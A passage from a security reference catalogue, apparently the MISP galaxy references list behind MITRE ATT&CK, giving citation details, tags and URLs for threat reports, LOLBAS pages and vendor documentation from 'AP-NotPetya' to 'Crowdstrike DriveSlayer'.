FRANK BAJAK AND RAPHAEL SATTER. (2017, June 30). Companies still hobbled from fearsome cyberattack. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="AP-NotPetya"

Table 13100. Table References

Links

https://apnews.com/article/russia-ukraine-technology-business-europe-hacking-ce7a8aca506742ab8e8873e7f9f229c2

Microsoft COM

Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.

The tag is: misp-galaxy:references="Microsoft COM"

Table 13101. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx

Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022

Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.

The tag is: misp-galaxy:references="Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022"

Table 13102. Table References

Links

https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/

US-CERT Alert TA15-314A Web Shells

US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.

The tag is: misp-galaxy:references="US-CERT Alert TA15-314A Web Shells"

Table 13103. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA15-314A

Comsvcs.dll - LOLBAS Project

LOLBAS. (2019, August 30). Comsvcs.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Comsvcs.dll - LOLBAS Project"

Table 13104. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/comsvcs/

Condi-Botnet-binaries

Joie Salvio and Roy Tay. (2023, June 20). Condi DDoS Botnet Spreads via TP-Link’s CVE-2023-1389. Retrieved September 5, 2023.

The tag is: misp-galaxy:references="Condi-Botnet-binaries"

Table 13105. Table References

Links

https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389

Microsoft Common Conditional Access Policies

Microsoft. (2022, December 14). Conditional Access templates. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Common Conditional Access Policies"

Table 13106. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/concept-conditional-access-policy-common

Trend Micro Conficker

Trend Micro. (2014, March 18). Conficker. Retrieved February 18, 2021.

The tag is: misp-galaxy:references="Trend Micro Conficker"

Table 13107. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/conficker

ConfigSecurityPolicy.exe - LOLBAS Project

LOLBAS. (2020, September 4). ConfigSecurityPolicy.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="ConfigSecurityPolicy.exe - LOLBAS Project"

Table 13108. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/

Microsoft SAML Token Lifetimes

Microsoft. (2020, December 14). Configurable token lifetimes in Microsoft Identity Platform. Retrieved December 22, 2020.

The tag is: misp-galaxy:references="Microsoft SAML Token Lifetimes"

Table 13109. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes

Apple Developer Configuration Profile

Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Apple Developer Configuration Profile"

Table 13110. Table References

Links

https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf

MDMProfileConfigMacOS

Apple. (2019, May 3). Configuration Profile Reference, Developer. Retrieved April 15, 2022.

The tag is: misp-galaxy:references="MDMProfileConfigMacOS"

Table 13111. Table References

Links

https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf

Azure Just in Time Access 2023

Microsoft. (2023, August 29). Configure and approve just-in-time access for Azure Managed Applications. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="Azure Just in Time Access 2023"

Table 13112. Table References

Links

https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-in-time-access

capture_embedded_packet_on_software

Cisco. (2022, August 17). Configure and Capture Embedded Packet on Software. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="capture_embedded_packet_on_software"

Table 13113. Table References

Links

https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html

Kubernetes Security Context

Kubernetes. (n.d.). Configure a Security Context for a Pod or Container. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Kubernetes Security Context"

Table 13114. Table References

Links

https://kubernetes.io/docs/tasks/configure-pod-container/security-context/

Microsoft SharePoint Logging

Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.

The tag is: misp-galaxy:references="Microsoft SharePoint Logging"

Table 13115. Table References

Links

https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2

TechNet RDP NLA

Microsoft. (n.d.). Configure Network Level Authentication for Remote Desktop Services Connections. Retrieved June 6, 2016.

The tag is: misp-galaxy:references="TechNet RDP NLA"

Table 13116. Table References

Links

https://technet.microsoft.com/en-us/library/cc732713.aspx

Microsoft Security Alerts for Azure AD Roles

Microsoft. (2022, November 14). Configure security alerts for Azure AD roles in Privileged Identity Management. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Security Alerts for Azure AD Roles"

Table 13117. Table References

Links

https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/aad-security-baseline

Kubernetes Service Accounts

Kubernetes. (2022, February 26). Configure Service Accounts for Pods. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Kubernetes Service Accounts"

Table 13118. Table References

Links

https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/

Windows RDP Sessions

Microsoft. (n.d.). Configure Timeout and Reconnection Settings for Remote Desktop Services Sessions. Retrieved December 11, 2017.

The tag is: misp-galaxy:references="Windows RDP Sessions"

Table 13119. Table References

Links

https://technet.microsoft.com/en-us/library/cc754272(v=ws.11).aspx

Microsoft Configure LSA

Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.

The tag is: misp-galaxy:references="Microsoft Configure LSA"

Table 13120. Table References

Links

https://technet.microsoft.com/en-us/library/dn408187.aspx

Microsoft LSA Protection Mar 2014

Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft LSA Protection Mar 2014"

Table 13121. Table References

Links

https://technet.microsoft.com/library/dn408187.aspx

Microsoft LSA

Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved February 13, 2015.

The tag is: misp-galaxy:references="Microsoft LSA"

Table 13122. Table References

Links

https://technet.microsoft.com/en-us/library/dn408187.aspx

Configuring Data Access audit logs

Google. (n.d.). Configuring Data Access audit logs. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Configuring Data Access audit logs"

Table 13123. Table References

Links

https://cloud.google.com/logging/docs/audit/configure-data-access

Microsoft SID Filtering Quarantining Jan 2009

Microsoft. (n.d.). Configuring SID Filter Quarantining on External Trusts. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft SID Filtering Quarantining Jan 2009"

Table 13124. Table References

Links

https://technet.microsoft.com/library/cc794757.aspx

TechRepublic Wireless GPO FEB 2009

Schauland, D. (2009, February 24). Configuring Wireless settings via Group Policy. Retrieved July 26, 2018.

The tag is: misp-galaxy:references="TechRepublic Wireless GPO FEB 2009"

Table 13125. Table References

Links

https://www.techrepublic.com/blog/data-center/configuring-wireless-settings-via-group-policy/

ZDNet Dtrack

Catalin Cimpanu. (2019, October 30). Confirmed: North Korean malware found on Indian nuclear plant’s network. Retrieved January 20, 2021.

The tag is: misp-galaxy:references="ZDNet Dtrack"

Table 13126. Table References

Links

https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/

Uptycs Confucius APT Jan 2021

Uptycs Threat Research Team. (2021, January 12). Confucius APT deploys Warzone RAT. Retrieved December 17, 2021.

The tag is: misp-galaxy:references="Uptycs Confucius APT Jan 2021"

Table 13127. Table References

Links

https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat

TrendMicro Confucius APT Aug 2021

Lunghi, D. (2021, August 17). Confucius Uses Pegasus Spyware-related Lures to Target Pakistani Military. Retrieved December 26, 2021.

The tag is: misp-galaxy:references="TrendMicro Confucius APT Aug 2021"

Table 13128. Table References

Links

https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html

Conhost.exe - LOLBAS Project

LOLBAS. (2022, April 5). Conhost.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Conhost.exe - LOLBAS Project"

Table 13129. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Conhost/

EC2 Instance Connect

AWS. (2023, June 2). Connect using EC2 Instance Connect. Retrieved June 2, 2023.

The tag is: misp-galaxy:references="EC2 Instance Connect"

Table 13130. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html

Docker Docs Container

docker docs. (n.d.). Containers. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Docker Docs Container"

Table 13131. Table References

Links

https://docs.docker.com/engine/api/v1.41/#tag/Container

DigitalShadows CDN

Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="DigitalShadows CDN"

Table 13132. Table References

Links

https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/

Content trust in Azure Container Registry

Microsoft. (2019, September 5). Content trust in Azure Container Registry. Retrieved October 16, 2019.

The tag is: misp-galaxy:references="Content trust in Azure Container Registry"

Table 13133. Table References

Links

https://docs.microsoft.com/en-us/azure/container-registry/container-registry-content-trust

Content trust in Docker

Docker. (2019, October 10). Content trust in Docker. Retrieved October 16, 2019.

The tag is: misp-galaxy:references="Content trust in Docker"

Table 13134. Table References

Links

https://docs.docker.com/engine/security/trust/content_trust/

DFIR Conti Bazar Nov 2021

DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.

The tag is: misp-galaxy:references="DFIR Conti Bazar Nov 2021"

Table 13135. Table References

Links

https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

Cybereason Conti Jan 2021

Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021.

The tag is: misp-galaxy:references="Cybereason Conti Jan 2021"

Table 13136. Table References

Links

https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware

Cybleinc Conti January 2020

Cybleinc. (2021, January 21). Conti Ransomware Resurfaces, Targeting Government & Large Organizations. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="Cybleinc Conti January 2020"

Table 13137. Table References

Links

https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/

Control.exe - LOLBAS Project

LOLBAS. (2018, May 25). Control.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Control.exe - LOLBAS Project"

Table 13138. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Control/

Wikipedia Control Flow Integrity

Wikipedia. (2018, January 11). Control-flow integrity. Retrieved March 12, 2018.

The tag is: misp-galaxy:references="Wikipedia Control Flow Integrity"

Table 13139. Table References

Links

https://en.wikipedia.org/wiki/Control-flow_integrity

Kubernetes API Control Access

The Kubernetes Authors. (n.d.). Controlling Access to The Kubernetes API. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubernetes API Control Access"

Table 13140. Table References

Links

https://kubernetes.io/docs/concepts/security/controlling-access/

TrendMicro CPL Malware Dec 2013

Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018.

The tag is: misp-galaxy:references="TrendMicro CPL Malware Dec 2013"

Table 13141. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/

GitHub Conveigh

Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="GitHub Conveigh"

Table 13142. Table References

Links

https://github.com/Kevin-Robertson/Conveigh

MITRE Copernicus

Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.

The tag is: misp-galaxy:references="MITRE Copernicus"

Table 13143. Table References

Links

http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about

Secureworks COPPER FIELDSTONE Profile

Secureworks. (n.d.). COPPER FIELDSTONE. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="Secureworks COPPER FIELDSTONE Profile"

Table 13144. Table References

Links

https://www.secureworks.com/research/threat-profiles/copper-fieldstone

TechNet Copy

Microsoft. (n.d.). Copy. Retrieved April 26, 2016.

The tag is: misp-galaxy:references="TechNet Copy"

Table 13145. Table References

Links

https://technet.microsoft.com/en-us/library/bb490886.aspx

copy_cmd_cisco

Cisco. (2022, August 16). copy - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.

The tag is: misp-galaxy:references="copy_cmd_cisco"

Table 13146. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689

CopyKittens Nov 2015

Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017.

The tag is: misp-galaxy:references="CopyKittens Nov 2015"

Table 13147. Table References

Links

https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf

coregen.exe - LOLBAS Project

LOLBAS. (2020, October 9). coregen.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="coregen.exe - LOLBAS Project"

Table 13148. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/

Apple Core Services

Apple. (n.d.). Core Services. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="Apple Core Services"

Table 13149. Table References

Links

https://developer.apple.com/documentation/coreservices

Microsoft STRONTIUM Aug 2019

MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.

The tag is: misp-galaxy:references="Microsoft STRONTIUM Aug 2019"

Table 13150. Table References

Links

https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/

Palo Alto ARP

Palo Alto Networks. (2021, November 24). Cortex XDR Analytics Alert Reference: Uncommon ARP cache listing via arp.exe. Retrieved December 7, 2021.

The tag is: misp-galaxy:references="Palo Alto ARP"

Table 13151. Table References

Links

https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/uncommon-arp-cache-listing-via-arp-exe.html

F-Secure Cosmicduke

F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014.

The tag is: misp-galaxy:references="F-Secure Cosmicduke"

Table 13152. Table References

Links

https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf

Costin Raiu IAmTheKing October 2020

Costin Raiu. (2020, October 2). Costin Raiu Twitter IAmTheKing SlothfulMedia. Retrieved November 16, 2020.

The tag is: misp-galaxy:references="Costin Raiu IAmTheKing October 2020"

Table 13153. Table References

Links

https://twitter.com/craiu/status/1311920398259367942

Google Iran Threats October 2021

Bash, A. (2021, October 14). Countering threats from Iran. Retrieved January 4, 2023.

The tag is: misp-galaxy:references="Google Iran Threats October 2021"

Table 13154. Table References

Links

https://blog.google/threat-analysis-group/countering-threats-iran/

Cisco DNSMessenger March 2017

Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.

The tag is: misp-galaxy:references="Cisco DNSMessenger March 2017"

Table 13155. Table References

Links

http://blog.talosintelligence.com/2017/03/dnsmessenger.html

Juniper IcedID June 2020

Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.

The tag is: misp-galaxy:references="Juniper IcedID June 2020"

Table 13156. Table References

Links

https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware

PTSecurity Higaisa 2020

PT ESC Threat Intelligence. (2020, June 4). COVID-19 and New Year greetings: an investigation into the tools and methods used by the Higaisa group. Retrieved March 2, 2021.

The tag is: misp-galaxy:references="PTSecurity Higaisa 2020"

Table 13157. Table References

Links

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/

F-Secure CozyDuke

F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.

The tag is: misp-galaxy:references="F-Secure CozyDuke"

Table 13158. Table References

Links

https://www.f-secure.com/documents/996508/1030745/CozyDuke

TrendMicro CPL Malware Jan 2014

Mercês, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.

The tag is: misp-galaxy:references="TrendMicro CPL Malware Jan 2014"

Table 13159. Table References

Links

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf

Trend Micro CPL

Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.

The tag is: misp-galaxy:references="Trend Micro CPL"

Table 13160. Table References

Links

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf

SANS Brute Ratel October 2022

Thomas, W. (2022, October 5). Cracked Brute Ratel C4 framework proliferates across the cybercriminal underground. Retrieved February 6, 2023.

The tag is: misp-galaxy:references="SANS Brute Ratel October 2022"

Table 13161. Table References

Links

https://www.sans.org/blog/cracked-brute-ratel-c4-framework-proliferates-across-the-cybercriminal-underground/

Stealthbits Cracking AS-REP Roasting Jun 2019

Jeff Warren. (2019, June 27). Cracking Active Directory Passwords with AS-REP Roasting. Retrieved August 24, 2020.

The tag is: misp-galaxy:references="Stealthbits Cracking AS-REP Roasting Jun 2019"

Table 13162. Table References

Links

https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/

AdSecurity Cracking Kerberos Dec 2015

Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.

The tag is: misp-galaxy:references="AdSecurity Cracking Kerberos Dec 2015"

Table 13163. Table References

Links

https://adsecurity.org/?p=2293

Dragos Crashoverride 2017

Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="Dragos Crashoverride 2017"

Table 13164. Table References

Links

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

Unit 42 ATOM Crawling Taurus

Unit 42. (n.d.). Crawling Taurus. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="Unit 42 ATOM Crawling Taurus"

Table 13165. Table References

Links

https://unit42.paloaltonetworks.com/atoms/crawling-taurus/

Microsoft Image

Microsoft. (2021, August 23). Create a managed image of a generalized VM in Azure. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Microsoft Image"

Table 13166. Table References

Links

https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource

Microsoft Snapshot

Microsoft. (2021, September 16). Create a snapshot of a virtual hard disk. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Microsoft Snapshot"

Table 13167. Table References

Links

https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk

Microsoft Create Token

Brower, N., Lich, B. (2017, April 19). Create a token object. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="Microsoft Create Token"

Table 13168. Table References

Links

https://docs.microsoft.com/windows/device-security/security-policy-settings/create-a-token-object

GCP Create Cloud Identity Users

Google. (n.d.). Create Cloud Identity user accounts. Retrieved January 29, 2020.

The tag is: misp-galaxy:references="GCP Create Cloud Identity Users"

Table 13169. Table References

Links

https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554

Createdump.exe - LOLBAS Project

LOLBAS. (2022, January 20). Createdump.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Createdump.exe - LOLBAS Project"

Table 13170. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/

Google Cloud Kubernetes IAM

Google Cloud. (n.d.). Create IAM policies. Retrieved July 14, 2023.

The tag is: misp-galaxy:references="Google Cloud Kubernetes IAM"

Table 13171. Table References

Links

https://cloud.google.com/kubernetes-engine/docs/how-to/iam

Microsoft CreateProcess

Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft CreateProcess"

Table 13172. Table References

Links

http://msdn.microsoft.com/en-us/library/ms682425

Microsoft CLI Create Subscription

Microsoft . (n.d.). Create subscription. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="Microsoft CLI Create Subscription"

Table 13173. Table References

Links

https://learn.microsoft.com/en-us/graph/api/subscription-post-subscriptions

Microsoft. (2021, October 28). Create symbolic links. Retrieved April 27, 2022.

The tag is: misp-galaxy:references="create_sym_links"

Table 13174. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/create-symbolic-links

GCP - Creating and Starting a VM

Google. (2020, April 23). Creating and Starting a VM instance. Retrieved May 1, 2020.

The tag is: misp-galaxy:references="GCP - Creating and Starting a VM"

Table 13175. Table References

Links

https://cloud.google.com/compute/docs/instances/create-start-instance#api_2

AWS Create IAM User

AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved January 29, 2020.

The tag is: misp-galaxy:references="AWS Create IAM User"

Table 13176. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html

GNU Fork

Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="GNU Fork"

Table 13177. Table References

Links

https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html

AppleDocs Launch Agent Daemons

Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.

The tag is: misp-galaxy:references="AppleDocs Launch Agent Daemons"

Table 13178. Table References

Links

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

TechNet Logon Scripts

Microsoft. (2005, January 21). Creating logon scripts. Retrieved April 27, 2016.

The tag is: misp-galaxy:references="TechNet Logon Scripts"

Table 13179. Table References

Links

https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx

Google Cloud Service Account Credentials

Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Google Cloud Service Account Credentials"

Table 13180. Table References

Links

https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials

creatingXPCservices

Apple. (2016, September 9). Creating XPC Services. Retrieved April 19, 2022.

The tag is: misp-galaxy:references="creatingXPCservices"

Table 13181. Table References

Links

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1

GitHub Creddump7

Flathers, R. (2018, February 19). creddump7. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="GitHub Creddump7"

Table 13182. Table References

Links

https://github.com/Neohapsis/creddump7

Microsoft Midnight Blizzard Replay Attack

Microsoft Threat Intelligence. (2023, June 21). Credential Attacks. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Microsoft Midnight Blizzard Replay Attack"

Table 13183. Table References

Links

https://twitter.com/MsftSecIntel/status/1671579359994343425

Anomali Template Injection MAR 2018

Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018.

The tag is: misp-galaxy:references="Anomali Template Injection MAR 2018"

Table 13184. Table References

Links

https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104

Microsoft Credential Locker

Microsoft. (2013, October 23). Credential Locker Overview. Retrieved November 24, 2020.

The tag is: misp-galaxy:references="Microsoft Credential Locker"

Table 13185. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN

Microsoft CredEnumerate

Microsoft. (2018, December 5). CredEnumarateA function (wincred.h). Retrieved November 24, 2020.

The tag is: misp-galaxy:references="Microsoft CredEnumerate"

Table 13186. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea

TrendmicroHideoutsLease

Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="TrendmicroHideoutsLease"

Table 13187. Table References

Links

https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf

doppelpaymer_crowdstrike

Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022.

The tag is: misp-galaxy:references="doppelpaymer_crowdstrike"

Table 13188. Table References

Links

https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/

Critical Vulnerabilities in PaperCut Print Management Software

Team Huntress. (2023, April 21). Critical Vulnerabilities in PaperCut Print Management Software. Retrieved May 8, 2023.

The tag is: misp-galaxy:references="Critical Vulnerabilities in PaperCut Print Management Software"

Table 13189. Table References

Links

https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software

Security Affairs SILENTTRINITY July 2019

Paganini, P. (2019, July 7). Croatia government agencies targeted with news SilentTrinity malware. Retrieved March 23, 2022.

The tag is: misp-galaxy:references="Security Affairs SILENTTRINITY July 2019"

Table 13190. Table References

Links

https://securityaffairs.co/wordpress/88021/apt/croatia-government-silenttrinity-malware.html

Die.net Linux crontab Man Page

Paul Vixie. (n.d.). crontab(5) - Linux man page. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="Die.net Linux crontab Man Page"

Table 13191. Table References

Links

https://linux.die.net/man/5/crontab

Symantec Frutas Feb 2013

Bingham, J. (2013, February 11). Cross-Platform Frutas RAT Builder and Back Door. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Symantec Frutas Feb 2013"

Table 13192. Table References

Links

https://www.symantec.com/connect/blogs/cross-platform-frutas-rat-builder-and-back-door

Bishop Fox Sliver Framework August 2019

Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021.

The tag is: misp-galaxy:references="Bishop Fox Sliver Framework August 2019"

Table 13193. Table References

Links

https://labs.bishopfox.com/tech-blog/sliver

Crowdstrike CrowdCast Oct 2013

Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Crowdstrike CrowdCast Oct 2013"

Table 13194. Table References

Links

https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem

Crowdstrike Global Threat Report Feb 2018

CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.

The tag is: misp-galaxy:references="Crowdstrike Global Threat Report Feb 2018"

Table 13195. Table References

Links

https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report

CrowdStrike GTR 2021 June 2021

CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="CrowdStrike GTR 2021 June 2021"

Table 13196. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

CrowdStrike Adversary Carbon Spider

CrowdStrike. (2022, June 01). CrowdStrike Adversary Carbon Spider. Retrieved June 01, 2022.

The tag is: misp-galaxy:references="CrowdStrike Adversary Carbon Spider"

Table 13197. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/carbon-spider/

CrowdStrike Adversary Cozy Bear

CrowdStrike. (2022, May 4). CrowdStrike Adversary Cozy Bear. Retrieved May 4, 2022.

The tag is: misp-galaxy:references="CrowdStrike Adversary Cozy Bear"

Table 13198. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/cozy-bear/

CrowdStrike Labyrinth Chollima Feb 2022

CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.

The tag is: misp-galaxy:references="CrowdStrike Labyrinth Chollima Feb 2022"

Table 13199. Table References

Links

https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/

CrowdStrike Adversary Ocean Buffalo

CrowdStrike. (2022, June 25). CrowdStrike Adversary Ocean Bufallo. Retrieved June 25, 2022.

The tag is: misp-galaxy:references="CrowdStrike Adversary Ocean Buffalo"

Table 13200. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/ocean-buffalo/

CrowdStrike Adversary Venomous Bear

CrowdStrike. (2022, May 4). CrowdStrike Adversary Venomous Bear. Retrieved May 4, 2022.

The tag is: misp-galaxy:references="CrowdStrike Adversary Venomous Bear"

Table 13201. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/venomous-bear/

CrowdStrike Adversary Wizard Spider

CrowdStrike. (2022, June 23). CrowdStrike Adversary Wizard Spider. Retrieved June 23, 2022.

The tag is: misp-galaxy:references="CrowdStrike Adversary Wizard Spider"

Table 13202. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/wizard-spider/

Crowdstrike DriveSlayer February 2022

Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Crowdstrike DriveSlayer February 2022"

Table 13203. Table References

Links

